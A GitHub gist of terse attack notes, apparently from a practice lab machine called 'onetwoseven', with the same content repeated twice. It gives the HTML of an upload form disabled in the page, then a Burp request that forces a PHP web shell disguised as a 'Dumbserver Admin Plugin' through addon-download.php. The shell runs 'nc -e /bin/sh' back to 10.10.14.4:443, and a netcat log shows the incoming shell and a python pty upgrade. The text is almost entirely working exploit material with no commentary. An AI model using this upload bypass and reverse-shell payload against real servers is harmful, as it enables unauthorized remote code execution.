dualfade/gist:c09c61fa430bfb5f263f87a082de6911

## gistfile1.txt
REMOVE CONTENT-LENGTH --
POST --

HTML SRC --
    <div class="row featurette">
      <div class="col-md-12">
        <h2 class="featurette-heading">Plugin Upload.<span class="text-muted"> Admins Only!</span></h2>
        <p class="lead">Upload new plugins to include on this status page using the upload form below.</p>
        <form action="addon-upload.php" method="POST" enctype="multipart/form-data">
          <input type="file" name="addon" />
          <input type="submit" disabled="disabled" /><sup><font size="-2" color="red"> Disabled for security reasons.</font></sup>
        </form>
      </div>
    </div>

BURP REPEATER HTTP CONTENT DISPO --
CREATE CONTENT-DISPO ( FORCE UPLOAD BY HAND )

POST /addon-download.php?addon=/addon-upload.php HTTP/1.1
Host: 127.0.0.1:60080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:60080/menu.php?addon=addons/ots-fs.php
Content-Type: multipart/form-data; boundary=---------------------------98525120815575954697690807
Cookie: PHPSESSID=7rgjg7nmu1j62pk0slb67ds3m3
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 334

-----------------------------98525120815575954697690807
Content-Disposition: form-data; name="addon"; filename="ots-shellz.php"

<?php
# Dumbserver Admin Plugin
# Fake phpinfo // or whatever we want

echo shell_exec("whoami" );
echo shell_exec("nc -e /bin/sh 10.10.14.4 443 " );
?>

-----------------------------98525120815575954697690807--

NETCAT --

21:10:50 cdowns@7242-alpha-reticuli ~ sudo nc -4 -lnvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.133.
Ncat: Connection from 10.10.10.133:42548.
id
uid=35(www-admin-data) gid=35(www-admin-data) groups=35(www-admin-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-admin-data@onetwoseven:/var/www/html-admin$
	REMOVE CONTENT-LENGTH --
	POST --

	HTML SRC --
	<div class="row featurette">
	<div class="col-md-12">
	<h2 class="featurette-heading">Plugin Upload.<span class="text-muted"> Admins Only!</span></h2>
	<p class="lead">Upload new plugins to include on this status page using the upload form below.</p>
	<form action="addon-upload.php" method="POST" enctype="multipart/form-data">
	<input type="file" name="addon" />
	<input type="submit" disabled="disabled" /><sup><font size="-2" color="red"> Disabled for security reasons.</font></sup>
	</form>
	</div>
	</div>

	BURP REPEATER HTTP CONTENT DISPO --
	CREATE CONTENT-DISPO ( FORCE UPLOAD BY HAND )

	POST /addon-download.php?addon=/addon-upload.php HTTP/1.1
	Host: 127.0.0.1:60080
	User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Referer: http://127.0.0.1:60080/menu.php?addon=addons/ots-fs.php
	Content-Type: multipart/form-data; boundary=---------------------------98525120815575954697690807
	Cookie: PHPSESSID=7rgjg7nmu1j62pk0slb67ds3m3
	Connection: close
	Upgrade-Insecure-Requests: 1
	Content-Length: 334

	-----------------------------98525120815575954697690807
	Content-Disposition: form-data; name="addon"; filename="ots-shellz.php"

	<?php
	# Dumbserver Admin Plugin
	# Fake phpinfo // or whatever we want

	echo shell_exec("whoami" );
	echo shell_exec("nc -e /bin/sh 10.10.14.4 443 " );
	?>

	-----------------------------98525120815575954697690807--

	NETCAT --

	21:10:50 cdowns@7242-alpha-reticuli ~ sudo nc -4 -lnvp 443
	Ncat: Version 7.70 ( https://nmap.org/ncat )
	Ncat: Listening on 0.0.0.0:443
	Ncat: Connection from 10.10.10.133.
	Ncat: Connection from 10.10.10.133:42548.
	id
	uid=35(www-admin-data) gid=35(www-admin-data) groups=35(www-admin-data)
	which python
	/usr/bin/python
	python -c 'import pty;pty.spawn("/bin/bash")'
	www-admin-data@onetwoseven:/var/www/html-admin$